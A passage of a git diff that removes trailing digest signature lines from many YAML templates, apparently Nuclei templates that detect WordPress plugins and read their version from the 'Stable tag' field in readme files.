b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index d253fc022f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100edd1b2432bb435712bb3c836ee03e269f042ff144b4d79458773e9add141b5a802205d5a1b94a0c762c6b7d0dcc4a63c599b769b7d6ea91ba47b220f486edd615d97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 4a2b6d610a..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c8b879cd645249dd2ee876486a50272f1844f58514e01ba7bd03f3b6b3d1fcd702210084aa3a7147a2eba6948c392c8390010a3c636df1f187b7768bd3d4edc01c0066:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c370c78fbe..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206b2a76aa52da2394b191b4951cf7bccbdce320f81dc091e04a2d82c916174b08022100ff30c876db711adb6909d28aa62286706910297075c05a4eac294a4a70643ce4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index b6948cb713..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206d99f3cbe7c4013e83bba3c9a4a34d35c36f443d023b7a6bfe3d516f67d4d5d002202c102a82e50d14d9a71185b450a07a8a33ff70cf4a6746f492f15b6d9c111c64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index e1d89d6d05..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200acd5862550cecad68cb8353a5b2bb7746b2c1f161c479359c2eaa5d7cb6139f02207c1add55c58b1426b23e68cdb0ae6332dddf09d4b4a41147d5d980a3ea64934f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 54f3268f0b..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e415f670340d9fca34aff252f4c8a6f2bc5bba26b6d7e4e49e040852d299ae6b02201b0723eb6133a8b5af08edf5c446ed9eb838a4e427312f2217de132545c0cad4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 89cb27d946..9d77ce9155 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220341e4289c3257b918eea32ef69e4bbd2e388fd995d77bdc1b2047feae599bc860220391529b56f9b30230b83fc782c0bec37dd46e980aab3cfe37b762ec2d0f80b3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 30e908afe6..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022061e25686ccff53a8bf2b1a4bb9851d816d5912c4928c6c36ee70f6032a35a14002207a6d45b60610de9fb27c8d4e81df148d41fff0e4152e310c6c4264582ea2d615:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 8672e953b5..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204d4960695e8c2588e7af087a583f8250eb1dc4188f44d69028b151f49ae6a00502201e1ff059971e64fc4f22da8c9ce276e4f86685a0a62feebb59b2bcc3f26172da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 419fd4b6d9..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cc2579b25352d295dfeba7ab534b05f2093f99d5af1dce561eee85fafb7bd332022035fb5513f0b92fd00cd19870b2933fac70fa94cacbcfe56dc229a8f573d04cba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index a60ef7661c..34d36d4349 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200ead196d00f8dc43320e34562e6ef4ef16b0e5d145f953069c77d9a8b8f819fc0220721b7a84d1d5028044370cb3357b7ca39ad3e58a20e0e424aae4f016080a8738:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index f8b1b42315..d4ac0d179e 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100faa55d1d77b85d43401a146dad83955b391766cedb6b7d7449c248e036c2a5b502205d94884e91e8c1861985be7f310c8ca9ce825197ea17311662526fa34c0284fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index d7934fefef..39b176dcb8 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b08a023f66d9f83a43d7459074d4099eac6d09cfe00c52b5c92a2d5898c5d22102202ba836b6d71afee558cf7742aca2fcdf4b5a2a437a64ce50ae882b3d569f111d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 2d35410f08..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200798057b7960606385653864c124b27e162564913101a35568157e1d27411a4002202fcd1b372f36e6c2313361c16bb0716faecf8cf94ea6daeb104e0933411fadc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index dafd27c34d..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a93b53d7bfd4017d9e3c05a1075a19cf0daffb1e5603d7a773d718e1537011ca022038b8798d545151796a0e8a4d0ad01e164a6293204f2ab76cc0c636ca5adcd7dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index a680fa6d4e..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009f88b1e36e7326b1a9e06c83f1a5e4de662e2fb00618a085892b5085dce4785102203561039cfebf0a3c46c66f9061c5679c746295f99f3dadd27f94173342a72f4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 5b9bf4287d..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c18d5186ffbed861e87d94241d86a6b9d2f3ad5e447d049d5f924384f0414955022056fe6f2ec0bdb7d2d7656902372a4b08ec14190ab6c7256f3cc3d80a599da268:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index bee355e205..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206c01bf5f8c85d3d72d361980a128911f80de4f2141af7aea7ad248b603d7ff76022100b00b40542320f66845dfc78c87de4d6a169426a6c41d4b66d2c3f83c35a6beb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 4952e6f761..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fd5273276cc90fbb2d626f57bdb8e3af814bcc9c7818d2306a3a16c35f61516d022054660e1c09e33193ca77a7bc75de931fcfac2fe9cf723bed72f9abed3ea87b29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cb5e905997..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e54cae1d5406a8a3ea3d0b67fed68a79cd68f8a9a3cac7cb6e61760c1914ff1e02201f7a0f232c92513ad9715bd32500168adacc05bb8b33651b6d928578fb82831a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6505f59fc6..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e37ef8821732017dd10c1f5855b86cd0c9e9623e48c8942da2d5921fd122ba2e0220617c7e0040d8e31cd0369d773b084a808104597500e2df8332abf662b3959304:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index b8fc4291e2..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022076180cd195018ab9e9f7a9d4176fcbf958bbbfa5dbe9bf6c9abc713e0d92496b022100b10b1349b80d16788621ae156a1101089a582133f1260ca71d897362d8c304fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 3dd9f9ecd4..a4c9f2c7c4 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b0fedd4573efc6339f4af68751477f67a1eee123716803c99545528d9cb906c4022100e1026e48e2857b76451de9731e92b520b83e1d30218187149db5785f35802f56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 6d06592853..1fd49d2e08 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022079d9bad3aa17e0060ffb79c9fdbcdedab1374a82837503da78565c7d53074e2102205c53286200279e0a2d515cfff5cdf8f439ae6e5db7f9090e105d8217d48aa70d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 6652e7029b..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ef66f2253a8f73bea318f5b0680399f21cb3547902630a77bb76a318ab5cca7e022077ac979d0ed49dd0b540931c5ed95159c861fc05b5e8fa0f59bc85ac27103102:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1ea3ecb269..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dad72f581bb5f7b9563180a79f47ea7c9ffd7670b3231dc1c3243b23e6c717bd02205ad3ccddfea7791e4bcd8bfcae1ead9082201202355c1d0fd59b75b02a64d12e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index b15b2ffcda..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210081dd687fc09142b0d253ff4231b5a5216485470aa90266d970f87949453fd209022100a92d657697fe8e5f21d12012cfafee2da44e59433986c94fb1e2d806fd5a8b2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 900986c2bf..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d7197dc799937ee92a87070e2bec7a9d4639e3ea97f47110a4e0ee57e96d157502202526f2ec0feaa66298b13a51c062e10ce098d5a68c70aa3e4c395c0b3da5958c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 9509390008..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eea6cf0e1df7b33b12ddb8ff27b40445f3ce7562c9e03da26f7ddb1ef832db0f022052d4d100693f572d1e90f863d80d04b19b01fc9a2658fb3d4bad716e54e31131:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index ec00e264f7..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d51b4b1c2f7f05b3c53641b2d1400748fef58bd0bdada3358e5da4189ac52923022100fbff9a0f8a447b45b5e57d7e3fa9b450d6140079718929896d776f5cf4f1ab88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index ede63fcebd..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022033a9234e8539159bc84c8b36d569ae45f9d9d5a5c91ac3761f8e719df7319bfa02204a2679103aaf5363fe8a3f3a552ec4bf40a1d718f0986d9cbc43eb0f4056106f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 88a00e1044..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e2e091554bc5bad35ed3a8d0c7990b85dca490a3d30845e2c6345e8389fc9724022100cd7c74c245a965d3ec0a28d75ac9eb1ddbade3daf9953d15941807afad0a94c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 41558aff39..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009ae2c109080e0ea2fd7a55713bc8d5549264c4a5a0ea174e8cda7931b5bf57b0022100f6e9fa818faaafb7a0ca720bd695d24d3f3abc4d3ca50a298360a54bed796f88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 0d229e73b7..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200b09c830896ef670733aed4fe8f3d2c695288b05df1898aa3227ffb201f60a0a0221008c861aa63ffc11dcc23dfb708a06dd6da364aeffb5b7f6c748997f671380f87b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 1e2f29fd85..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b3e88214161a30342b236b59057932b97795a3c3c3c48bd5c87b74c31f1701f102207f71824d375dba6ed32c09e378a315680a74e9c758a4a31f2f82182695431367:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index bfb5acae5b..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022008e8dcca47f05533aae9ee2b3b08c7c11361d7da04592281a67e6db48d2e5dc402207cb4138e376cdb3455f23f5ae6388a461308ea9d694a40eaaf21a90ad8a5d6c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 9162eda89b..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022013913404d1523caa5bd905fb2cc69b0b5efe0ac87403c5fca79e37fdf8ad5abd022023253c52a490e535921a300ee9cbadacfe4750b960fb30e73b1e4692c0510f79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index b3c63a70c5..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aa4d2b195a0c3c442794a38115dfbdb84baa56ded179d65ac5e1b69d761d3d24022100fbe180a1204cdfd181f1b67c19a2e08d326d018d4082187ee9c03b1550d85d80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 2139efeae3..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220493fd9fcd73e4303db85563000214d868fc8e0f8b3c04be990b0868094ab492c022055f9b3ce183acccfc6d2589378b7e7f70c3faa6ee6b0a2dfef0beeacfdb71aa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 7aeb370f59..34115bcd0f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a23e05acf76755b0dc8c06f9cbede36c40f764c61679ced5b406e63e2c1c2773022100d61a193b1d7109d7bb824052bcb4a1adcf93fa1dc6fa2ffb66c5789deb1f43fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index b8a1af5ae5..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203e6655ebe92e82938c265a88ce42c5b6932de4ab233475440ba335a9b9b60ee702200b819cbd5b507419851cbc6f52ba56396c879a00871ffaefcfba47b6a3532b95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 83b2d3b3f5..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c9445f5acc64cbc97004c27d719b75a91e7c36e16a58394be6034dc1818dd7b8022068aef7dd6f2909fa6e7f08ed5a1e8a17bfdbae9b32d0efdffaae4034b7bd0557:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 34d0aed30b..56dfdf4a59 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008ea91e89b79a8426b9df9228cd437caf6116247a54127f8063800d21165dbd0902210094418fbb57c68e1f1771f0818fea60d6c756522ad9c9ea77dddc00a2e1ee33c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 784f3ce059..c3ec4ebd80 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b95cc744d94df5bcd6887b99e01002a229556da5e96c7304617611b0a7c8615d022077f7c57bec02e0fac7a7af345ecd9ad2f79942bd0256df25208ee1ce9432a0e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 463b6d4f99..2276545093 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c7db53b75ca28aff0f25241d7d1b36d764ce8deef81e92b1dab7f9ced6bb428902206dc8542cbd6a3b4ea9ce0143ccfdfb7c24ec1316e7830a5820d2f48fd60c78dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 23d9f42047..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009effd6619ff898d2d6c02b2cf087f9720d228ff1fa919f0a645a373248b4075f022100e85b57984913bfb2e39477ce6e5e07151e5b189e80cc96eaaefb739ac9d4f60b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index f9ceb98f72..7b28bf7020 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ 